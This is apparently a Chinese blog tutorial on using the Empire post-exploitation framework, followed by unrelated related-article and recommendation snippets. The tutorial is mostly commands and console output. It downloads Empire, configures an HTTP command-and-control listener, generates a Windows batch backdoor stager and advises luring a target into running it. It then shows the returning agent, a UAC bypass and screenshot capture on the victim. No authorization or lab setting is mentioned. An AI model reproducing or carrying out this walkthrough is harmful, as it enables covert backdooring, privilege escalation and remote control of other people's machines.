1、安装

1.1、系统环境:

  • Debian系Linux:例如Ubuntu和Kali(本文使用Kali作为环境)

1.2、安装命令:

安装最后需要输入用户名、密码

wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip

unzip Empire-master.zip

cd  Empire-master

cd setup/

./install.sh

1.3、测试启动

root@kali:~# cd Empire

root@kali:~/Empire# ./empire

2、使用

2.1、基本使用

#查询命令help

(Empire) > help

2.2、创建一个监听器

  • tips1 列举可以使用tab补全
  • tips2 监听模块介绍
*  http[s],用http[s]进行交互。

*  http_com,使用IE的COM组件进行交互。

*  http_foreign,这个跟http看不出差别在哪。

*  http_hop,接收到的请求转发到其他的listener,猜测用于C2。

*  dbx/onedrive,使用dropbox或者onedrive作为信息传递的中介,类似QQ空间上线或者weibo上线的远控。

*  http_mapi,通过邮件上线。

*  meterpreter,就不多说了,大家都知道的。
  • tips3 我们使用http进行监听作为此次演示的模块
(Empire) > listeners

[!] No listeners currently active

(Empire: listeners) > uselistener

dbx           http          http_com      http_foreign  http_hop      http_mapi     meterpreter   onedrive      redirector

(Empire: listeners) > uselistener http

(Empire: listeners/http) >

于是就创建好了一个没有做任何配置的监听器

2.3、配置监听器

和msf还是很类似的,info查看配置,set配置选项值

(Empire: listeners/http) > set Port 8080

(Empire: listeners/http) > set Name monitor

(Empire: listeners/http) > info

    Name: HTTP[S]

Category: client_server

Authors:

  @harmj0y

Description:

  Starts a http[s] listener (PowerShell or Python) that uses a

  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description

  ----              --------    -------                          -----------

  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.

  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).

  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).

  Name              True        monitor                          Name for the listener.

  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.

  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).

  DefaultLostLimit  True        60                               Number of missed checkins before exiting

  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).

  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.

  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.

                                process.php|Mozilla/5.0 (Windows

                                NT 6.1; WOW64; Trident/7.0;

                                rv:11.0) like Gecko

  Host              True        http://172.16.204.143:80         Hostname/IP for staging.

  CertPath          False                                        Certificate path for https listeners.

  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).

  Proxy             False       default                          Proxy to use for request (default, none, or other).

  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).

  StagingKey        True        63a9f0ea7bb98050796b649e85481845 Staging key for initial agent negotiation.

  BindIP            True        0.0.0.0                          The IP to bind to on the control server.

  Port              True        8080                             Port for the listener.

  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.

  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php

(Empire: listeners/http) >

2.4、启动监听器

(Empire) > execute

2.5、生成后门文件

通过usestager来生成文件,引诱对方运行,可以看到支持linux、Windows、osx

Empire: listeners) > usestager windows/

backdoorLnkMacro  csharp_exe        ducky             launcher_bat      launcher_sct      launcher_xml      macroless_msword  teensy

bunny             dll               hta               launcher_lnk      launcher_vbs      macro             shellcode

(Empire: listeners) > usestager windows/launcher_bat

(Empire: stager/windows/launcher_bat) > info



进行一波配置

  • tips1 名字要与监听器的名字一致哦
(Empire: stager/windows/launcher_bat) > set Listener monitor

(Empire: stager/windows/launcher_bat) > execute



生成的文件如图

3、发送给目标执行

3.1、运行后获取到连接

不管怎么运行的,反正shell回来了

(Empire: agents) > agents

3.2、进行回连并尝试bypassuac

(Empire: agents) > interact 29F438CA

(Empire: 29F438CA) >

(Empire: 29F438CA) > bypassuac monitor

3.3、一些操作

  • 3.3.1、屏幕截图
(Empire: 29F438CA) > sc

[*] Tasked 29F438CA to run TASK_CMD_WAIT_SAVE

[*] Agent 29F438CA tasked with task ID 2

[*] Tasked agent 29F438CA to run module powershell/collection/screenshot

(Empire: 29F438CA) > [+] File screenshot/CLIENT_2019-03-16_11-30-01.png from 29F438CA saved

[*] Agent 29F438CA returned results.

Output saved to ./downloads/29F438CA/screenshot/CLIENT_2019-03-16_11-30-01.png

[*] Valid results returned by 172.16.204.80

  • 3.3.2、查看可以用的模块
(Empire: 29F438CA) > usemodule

  • 3.3.3、查看agents下的命令
(Empire: 29F438CA) > help agentcmds

  • 3.3.4、运行ipconig作为例子
(Empire: 29F438CA) > ipconfig

  • 3.3.5、输入help查看命令,不是shellcmd,而是agent下的指令哦
(Empire: 29F438CA) > help

指令有啥作用一看就懂,尤其是做过渗透,就不赘述了

后渗透神器Empire的简单使用的更多相关文章

  1. 后渗透工具Empire使用教程

    一.前言 Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学.安全通信和灵活的架构之上.Empire实现了无需powershell.exe就可运 ...

  2. 后渗透神器Cobalt Strike的安装

    0x01 简介 Cobalt Strike集成了端口转发.扫描多模式端口监听Windows exe木马,生成Windows dll(动态链接库)木马,生成java木马,生成office宏病毒,生成木马 ...

  3. Metasploit简单使用——后渗透阶段

    在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详 ...

  4. 【渗透神器系列】Fiddler (收藏)

    发表于 2017-04-27   |   分类于 安全工具   |     |   阅读次数 593 人世起起落落 左手边上演的华灯初上 右手边是繁华落幕的星点余光 本篇作为渗透神器系列第二篇,将介绍 ...

  5. 【原创】渗透神器CoblatStrike实践(1)

    渗透神器CoblatStrike实践(1) 前言 正常的渗透测试: ​ 寻找漏洞,利用漏洞,拿到一定的权限 后渗透(CS为代表的): ​ 提升权限,内网渗透,权限维持 工具地址(非官方取到后门多,建议 ...

  6. wooyun内网渗透教学分享之内网信息探测和后渗透准备

    常规的,从web业务撕开口子url:bit.tcl.comgetshell很简单,phpcms的,一个Phpcms V9 uc api SQL的老洞直接getshell,拿到shell,权限很高,sy ...

  7. web安全后渗透--XSS平台搭建及使用

     xss平台搭建 1.申请一个云主机来进行建站:149.28.xx.xx 2.安装lnmp: wget http://soft.vpser.net/lnmp/lnmp1.5.tar.gz -cO ln ...

  8. 带你了解后渗透工具Koadic

    前言: 在朋友的博客上看到推荐的一款工具Koadic,我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能,我就自己写出来发给大家看看吧. 首先把项目克隆到本地: 项目地址 ...

  9. CobaltStrike4.0——渗透神器

    CobaltStrike4.0--渗透神器 Cobaltstrike简介 Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS,其拥有多种协议主机上线方式,集成了 ...

随机推荐

  1. poj3320 Jessica's Reading Problem(尺取思路+STL)

    https://vjudge.net/problem/POJ-3320 尺取法,要想好组织方式. 又被卡了cin.. #include<iostream> #include<cstd ...

  2. Vmware下mint os的安装

    在vmware 11中,mint倒是很好安装.直接读取iso文件,会自动进入一个类似WindowsPE的安装系统,直接双击开始安装就好,比较傻瓜化. 但是安装好了,字体太小,看着很不舒服,于是就倒腾V ...

  3. 关于kafka重新消费数据问题

    我们在使用consumer消费数据时,有些情况下我们需要对已经消费过的数据进行重新消费,这里介绍kafka中两种重新消费数据的方法. 1. 修改offset 我们在使用consumer消费的时候,每个 ...

  4. WordPress主题开发:按分类调用文章

    调用catid为2的分类下的文章,就是后台分类链接的tag_ID <?php $cat_query = new WP_Query(array( 'cat' => '2' )); ?> ...

  5. ReactNative如何在JS中引用原生自定义控件(rn变化太快,网上很多教程有坑,这个我研究后可用,特意分享)

    直接写一个Demo例子,有相关功底的肯定明白,会对特别的地方进行提醒,本文基于https://blog.csdn.net/lintcgirl/article/details/53489490,但是按此 ...

  6. PLC是嵌入式系统吗?【转】

    PLC是嵌入式系统吗? 一.PLC即Programmable Logic Controller,可编程逻辑控制器 单片机又名MCU即microprocessor control unit,微处理机控制 ...

  7. Hexo 博客 github.io MD

    Markdown版本笔记 我的GitHub首页 我的博客 我的微信 我的邮箱 MyAndroidBlogs baiqiantao baiqiantao bqt20094 baiqiantao@sina ...

  8. shell编程学习笔记(十二):Shell中的break/continue跳出循环

    在循环遍历中,可以添加对应判断条件跳出循环,跳出循环可以使用break/continue,这个跟java语言是一样的,break是指跳出整个循环,continue是指跳出当前循环体,继续下一项循环. ...

  9. 每天一个linux命令(4):mkdir

    1.命令简介 mkdir (Make Directory 创建目录): 若指定目录不存在则创建目录.在创建目录时,要求创建目录的用户具有写权限,并应保证新建的目录没有重名. 2.用法 用法:mkdir ...

  10. IDEA使用笔记(十)——设置Java方法注释

    如果你看到了,这篇博文,那么你是幸运的!你问什么?你百度百度同类型的网文就明白了! 一:先看效果 二:我的实验过程(肯定还有别的方式) 1:新建   Template Group,详细操作步骤见下图 ...